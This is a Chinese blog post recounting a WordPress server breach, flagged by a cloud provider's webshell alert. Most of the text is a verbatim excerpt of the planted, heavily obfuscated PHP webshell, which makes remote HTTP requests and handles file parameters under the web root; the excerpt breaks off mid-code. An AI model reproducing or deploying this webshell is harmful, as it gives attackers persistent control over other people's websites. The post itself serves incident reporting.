首页 » 文章 » 文章 » 记录一次因 WordPress 服务器被黑的事件

记录一次因 WordPress 服务器被黑的事件

其实不是 WordPress 系统的锅子,还是自身安全意识薄弱的原因。事件大致是这样的:

晚上11点多接到阿里云紧急告警,立马登录后台查看,告警内容如下

网站后门-发现后门(Webshell)文件阻断成功
备注
该告警由如下引擎检测发现:
木马文件路径:/www/nclea.php
影响域名:–
首次发现时间:2020-04-21 23:14:30
更新时间:2020-04-21 23:47:55
木马类型:Webshell
源文件下载:下载

发现一个后门 nclea.php 文件,马上登录服务器查看,发现 web 目录新增了三个文件,部分文件内容如下

<?php
$OO_OO_00_0='1';
$O0OO0_O_0_="85gwl3qu9pv1koimbf2ceds_x7y6nt4ajrz0-h";$O_00OO0__O=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{14}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29};$O0_00__OOO=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{31}.$O0OO0_O_0_{23}.$O0OO0_O_0_{21}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{31};$OOO00_O_0_=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{16}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{2};$OOO00__O0_=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20}.$O0OO0_O_0_{13}.$O0OO0_O_0_{7}.$O0OO0_O_0_{29};$OO0_O_O0_0=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{9}.$O0OO0_O_0_{7}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O00O_0OO__=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O_000O__OO=$O0OO0_O_0_{17}.$O0OO0_O_0_{7}.$O0OO0_O_0_{28}.$O0OO0_O_0_{19}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{14}.$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O0_OO_00O_=$O0OO0_O_0_{19}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{17}.$O0OO0_O_0_{7}.$O0OO0_O_0_{28}.$O0OO0_O_0_{19}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28};$O__O_O0O00=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{28}.$O0OO0_O_0_{28}.$O0OO0_O_0_{20}.$O0OO0_O_0_{19}.$O0OO0_O_0_{29};$OO_0__0OO0=$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{37}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{16}.$O0OO0_O_0_{26}.$O0OO0_O_0_{28}.$O0OO0_O_0_{31}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20};$O__0_0OO0O=$O0OO0_O_0_{16}.$O0OO0_O_0_{31}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{27}.$O0OO0_O_0_{30}.$O0OO0_O_0_{23}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20}.$O0OO0_O_0_{19}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20};$OO__O0O_00=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{3}.$O0OO0_O_0_{33}.$O0OO0_O_0_{14}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20};$O00O0__OO_=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20};$O0O00__O_O=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{23}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{9}.$O0OO0_O_0_{4}.$O0OO0_O_0_{31}.$O0OO0_O_0_{19}.$O0OO0_O_0_{20};$O_OOO_000_=$O0OO0_O_0_{22}.$O0OO0_O_0_{13}.$O0OO0_O_0_{19}.$O0OO0_O_0_{12}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{21};$OO0OO0_0__=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{14}.$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$O0OOO_0__0=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{13}.$O0OO0_O_0_{9}.$O0OO0_O_0_{29};$O0O00O___O=$O0OO0_O_0_{31}.$O0OO0_O_0_{33}.$O0OO0_O_0_{33}.$O0OO0_O_0_{31}.$O0OO0_O_0_{26}.$O0OO0_O_0_{23}.$O0OO0_O_0_{22}.$O0OO0_O_0_{37}.$O0OO0_O_0_{14}.$O0OO0_O_0_{17}.$O0OO0_O_0_{29};$O_O_00_O0O=$O0OO0_O_0_{9}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{2}.$O0OO0_O_0_{23}.$O0OO0_O_0_{15}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{19}.$O0OO0_O_0_{37};$O__00O_OO0=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{33}.$O0OO0_O_0_{33}.$O0OO0_O_0_{13}.$O0OO0_O_0_{33};$O_00OO_0O_=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20};$OO__O00O0_=$O0OO0_O_0_{9}.$O0OO0_O_0_{31}.$O0OO0_O_0_{33}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20}.$O0OO0_O_0_{23}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4};$OO00OO___0=$O0OO0_O_0_{2}.$O0OO0_O_0_{34}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{17}.$O0OO0_O_0_{4}.$O0OO0_O_0_{31}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20};$O__OO00_0O=$O0OO0_O_0_{17}.$O0OO0_O_0_{14}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{15}.$O0OO0_O_0_{29}.$O0OO0_O_0_{14}.$O0OO0_O_0_{15}.$O0OO0_O_0_{20};$O_0_OO_00O=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{14}.$O0OO0_O_0_{29};$OOO__O0_00=$O0OO0_O_0_{19}.$O0OO0_O_0_{7}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{23}.$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{20}.$O0OO0_O_0_{19};$OO_0_0_OO0=$O0OO0_O_0_{15}.$O0OO0_O_0_{29}.$O0OO0_O_0_{23}.$O0OO0_O_0_{33}.$O0OO0_O_0_{31}.$O0OO0_O_0_{28}.$O0OO0_O_0_{21};$O0OO0O0___=$O0OO0_O_0_{14}.$O0OO0_O_0_{15}.$O0OO0_O_0_{9}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20};$O00__O_O0O=$O0OO0_O_0_{20}.$O0OO0_O_0_{24}.$O0OO0_O_0_{9}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21}.$O0OO0_O_0_{20};$O0O0_0_O_O=$O0OO0_O_0_{7}.$O0OO0_O_0_{22}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{20}.$O0OO0_O_0_{9};$O_O_0O0_O0=$O0OO0_O_0_{7}.$O0OO0_O_0_{28}.$O0OO0_O_0_{4}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28}.$O0OO0_O_0_{12};$O0O0_OO__0=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33};$OO0_0_0_OO=$O0OO0_O_0_{22}.$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{4}.$O0OO0_O_0_{20}.$O0OO0_O_0_{28};$O__O00_OO0=$O0OO0_O_0_{17}.$O0OO0_O_0_{3}.$O0OO0_O_0_{33}.$O0OO0_O_0_{14}.$O0OO0_O_0_{29}.$O0OO0_O_0_{20};$O_O0OO__00=$O0OO0_O_0_{17}.$O0OO0_O_0_{19}.$O0OO0_O_0_{4}.$O0OO0_O_0_{13}.$O0OO0_O_0_{22}.$O0OO0_O_0_{20};$O0OO00O___=$O0OO0_O_0_{29}.$O0OO0_O_0_{13}.$O0OO0_O_0_{7}.$O0OO0_O_0_{19}.$O0OO0_O_0_{37};$OO0O__00O_=$O0OO0_O_0_{17}.$O0OO0_O_0_{33}.$O0OO0_O_0_{20}.$O0OO0_O_0_{31}.$O0OO0_O_0_{21};$O00O_0_OO_=$O0OO0_O_0_{17}.$O0OO0_O_0_{2}.$O0OO0_O_0_{20}.$O0OO0_O_0_{29}.$O0OO0_O_0_{22};$OO_O_000_O=$O0OO0_O_0_{19}.$O0OO0_O_0_{37}.$O0OO0_O_0_{15}.$O0OO0_O_0_{13}.$O0OO0_O_0_{21};$O_00O_O0O_=$O0OO0_O_0_{29}.$O0OO0_O_0_{33}.$O0OO0_O_0_{14}.$O0OO0_O_0_{15};$O_0__0OOO0=$O0OO0_O_0_{32}.$O0OO0_O_0_{13}.$O0OO0_O_0_{14}.$O0OO0_O_0_{28};$O_OO00__0O=$O0OO0_O_0_{17}.$O0OO0_O_0_{20}.$O0OO0_O_0_{13}.$O0OO0_O_0_{17};header('Content-Type:text/html;charset=utf-8');;$OO0O00__O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f\x5f"]('$O0_O_OO_00=\'\',$O_0OO00__O=NULL,$O__0OO0O_0=array()','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x30\x4f"]("/^http\\:\\/\\//si",$O0_O_OO_00)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x71\x71"])){$OO_0__OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$OO_0__OO00.=$O0_O_OO_00;echo $OO_0__OO00;unset($OO_0__OO00);exit();}return \'\';}$O_0O0O__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$O_0_O0OO_0=$O0O_0_OO_0=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30\x4f"](\'|\',$O_0O0O__0O) as $c){$O0O_O_O00_=1;foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30\x4f"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f"]($d)){$O0O_O_O00_=0;}}unset($d);if($O0O_O_O00_){$O_0_O0OO_0=$c;break;}}unset($O_0O0O__0O,$c);if($O_0_O0OO_0==\'\'){return 0;}if(substr($O_0_O0OO_0,0,1)==\'c\'){$O0O00_O__O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_URL,$O0_O_OO_00);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_USERAGENT,\'WHR\');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x4f\x5f\x30\x5f\x5f\x30"]($O0O00_O__O,CURLOPT_TIMEOUT,100);$O__O0_O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O0O00_O__O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x4f\x5f\x30\x4f\x5f"]($O0O00_O__O);if(!$O__O0_O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$OO_0__OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Sy4tyhTlFILSrtPKLwIA\');$OO_0__OO00.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x30\x4f\x5f\x4f\x4f\x30"]($O0O00_O__O);echo $OO_0__OO00;unset($OO_0__OO00);exit();}return 0;}else{$O__O0_O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"]($O__O0_O00O,"\\xEF\\xBB\\xBF"));return $O__O0_O00O;}}$O_O0O0O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x4f\x30\x5f"]($O0_O_OO_00);isset($O_O0O0O0__["\x68\x6f\x73\x74"])||$O_O0O0O0__["\x68\x6f\x73\x74"]=\'\';isset($O_O0O0O0__["\x70\x61\x74\x68"])||$O_O0O0O0__["\x70\x61\x74\x68"]=\'\';isset($O_O0O0O0__["\x71\x75\x65\x72\x79"])|| $O_O0O0O0__["\x71\x75\x65\x72\x79"]=\'\';isset($O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"])||$O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"]=\'\';$O0OO__00O_=$O_O0O0O0__["\x70\x61\x74\x68"]?$O_O0O0O0__["\x70\x61\x74\x68"].($O_O0O0O0__["\x71\x75\x65\x72\x79"]?\'?\'.$O_O0O0O0__["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OO0_00__OO=$O_O0O0O0__["\x68\x6f\x73\x74"];if($O_O0O0O0__["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O_00O_O_0O=\'1.1\';$O0_OOO_0_0=empty($O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"])?443:$O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"];$OO0_00__OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Ky7OshTdLtPXBwA=\');$OO0_00__OO.=$O_O0O0O0__["\x68\x6f\x73\x74"];}else{$O_00O_O_0O=\'1.0\';$O0_OOO_0_0=empty($O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"])?80:$O_O0O0O0__["\x4f\x30\x5f\x4f\x4f\x4f\x5f\x30\x5f\x30"];}$OO0OO_0__0=\'Host:\';$OO0OO_0__0.=$OO0_00__OO;$O__0OO0O_0[]=$OO0OO_0__0;$O__0OO0O_0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$O__0OO0O_0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Cy1OLhTdJ1TE/NK7EK9wgtPCAA==\');$O__0OO0O_0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'c0xOThTi0osdLtPS1wIA\');unset($OO0OO_0__0);$O0O_0_OO_0="GET $O0OO__00O_ HTTP/$O_00O_O_0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x5f\x30\x4f\x4f\x4f\x30"]("\\r\\n",$O__0OO0O_0)."\\r\\n\\r\\n";unset($O__0OO0O_0,$O_O0O0O0__,$O_00O_O_0O,$O0OO__00O_);$OO_00O0_O_=null;if(substr($O_0_O0OO_0,-1)==\'n\'){$OO_00O0_O_=$O_0_O0OO_0($OO0_00__OO,$O0_OOO_0_0,$OO_0__OO00no,$OO_0__OO00str,30);}else{if(substr($O_0_O0OO_0,-1)==\'t\'){$O_0_O0O0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'K0kushTNLtPXBwA=\');$O_0_O0O0_O.=$OO0_00__OO;$O_0_O0O0_O.=\':\';$O_0_O0O0_O.=$O0_OOO_0_0;$OO_00O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x4f\x30\x5f\x5f\x4f"]($O_0_O0O0_O,$OO_0__OO00no,$OO_0__OO00str,30);unset($O_0_O0O0_O);}}$O0O0O0O___=\'\';if($OO_00O0_O_){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x5f\x4f\x5f\x30\x5f"]($OO_00O0_O_,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x5f\x5f\x4f\x30\x5f"]($OO_00O0_O_,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x5f\x4f\x4f\x30"]($OO_00O0_O_,$O0O_0_OO_0);$O__0O0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x5f\x5f\x4f\x4f\x4f"]($OO_00O0_O_);if(!$O__0O0_O0O["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x30\x5f\x5f\x30\x4f"]($OO_00O0_O_)){$OO0_O0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x5f\x4f\x4f\x5f"]($OO_00O0_O_);if($OO0_O0__O0&&($OO0_O0__O0=="\\r\\n"||$OO0_O0__O0=="\\n")){break;}unset($OO0_O0__O0);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x30\x30\x5f\x5f\x30\x4f"]($OO_00O0_O_)){$O00OO___0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x30\x30\x4f\x5f"]($OO_00O0_O_,8192);$O0O0O0O___.=$O00OO___0O;unset($O00OO___0O);}}unset($O__0O0_O0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30"]($OO_00O0_O_);}else{if(substr($O_0_O0OO_0,-1)==\'e\'){$OOO_000O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x5f\x30\x4f\x4f\x30"]($OO0_00__OO);$OO_00O0_O_=$O_0_O0OO_0(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x5f\x4f\x30\x4f\x30\x30"]($OO_00O0_O_,$OOO_000O__,$O0_OOO_0_0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x4f\x5f\x30\x30"]($OO_00O0_O_,$O0O_0_OO_0,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x30\x5f\x30\x5f\x4f\x4f"]($O0O_0_OO_0));while($O00O__OO0_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x4f\x5f\x30\x30\x30\x5f"]($OO_00O0_O_,8192)){$O0O0O0O___.=$O00O__OO0_;unset($O00O__OO0_);}$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30\x4f"]("\\r\\n\\r\\n",$O0O0O0O___);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x4f\x5f\x5f\x5f\x4f"]($O0O0O0O___);$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x4f\x30\x5f\x5f\x5f"]("\\r\\n\\r\\n",$O0O0O0O___);$O0OO0_0O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x4f\x4f\x30"](2,5);$OO__0O_O00=0;while($OO__0O_O00<$O0OO0_0O__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x4f\x5f\x30\x30"]($OO_00O0_O_,$O0O_0_OO_0,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x30\x5f\x30\x5f\x4f\x4f"]($O0O_0_OO_0));$OO__0O_O00++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x30\x5f\x4f\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($OO__0O_O00,$O0OO0_0O__);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x4f\x4f\x5f"]($OO_00O0_O_);unset($OOO_000O__);}}if($O0O0O0O___==\'\'){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]) and $O0_O_OO_00){$O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]($O0_O_OO_00);}}unset($O0O_0_OO_0,$O_0_O0OO_0,$OO_00O0_O_,$O0_OOO_0_0,$OO0_00__OO);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x5f\x4f\x30\x4f\x5f"]($O0O0O0O___,"\\xEF\\xBB\\xBF"));');$O000O__OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f\x5f"]('$O_0O0O__0Oaccxxs','$OO_0_O00_O=substr($O_0O0O__0Oaccxxs,0,5);$OO__OO00_0=substr($O_0O0O__0Oaccxxs,-5);$O_OO0_00_O=substr($O_0O0O__0Oaccxxs,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x30\x5f\x30\x5f\x4f\x4f"]($O_0O0O__0Oaccxxs)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x4f\x5f\x5f\x5f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO_0_O00_O.$O_OO0_00_O.$OO__OO00_0));');$O_O_0O_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x30\x30\x4f\x5f"]('$O_O_0O00_O=\'\'','$OO0_O_0O_0=isset($_REQUEST["\x66"])?$_REQUEST["\x66"]:\'\';$O__0O_0O0O=isset($_REQUEST["\x67"])?$_REQUEST["\x67"]:\'\';$OO0O__O0_0=isset($_REQUEST["\x64"])?$_REQUEST["\x64"]:\'\';$O__O0O00_O=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"];$OOO__0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7F9/